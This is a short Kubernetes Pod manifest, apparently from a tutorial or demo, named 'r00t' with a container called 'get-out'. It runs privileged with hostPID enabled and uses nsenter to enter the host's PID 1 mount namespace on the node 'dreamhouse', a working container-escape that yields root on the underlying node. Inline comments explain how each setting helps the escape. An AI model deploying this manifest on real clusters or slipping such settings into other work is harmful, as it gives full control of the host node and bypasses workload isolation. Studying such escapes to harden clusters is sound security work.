apiVersion: v1
kind: Pod
metadata:
  labels:
    run: r00t
  name: r00t
spec:
  containers:
  - command:
    - nsenter # super powerful tool that allows you to enter any namespace!
    - --mount=/proc/1/ns/mnt # mount namespace of the underlying node
    - --
    - /bin/sleep
    - 99d
    image: alpine:3.7
    name: get-out
    securityContext:
      privileged: true  # gives you access to every system call that's available to the Linux kernel!
  dnsPolicy: ClusterFirst
  hostPID: true  # gives us what we need to enumerate all the processes with nsenter
  nodeName: dreamhouse # our host to do this to
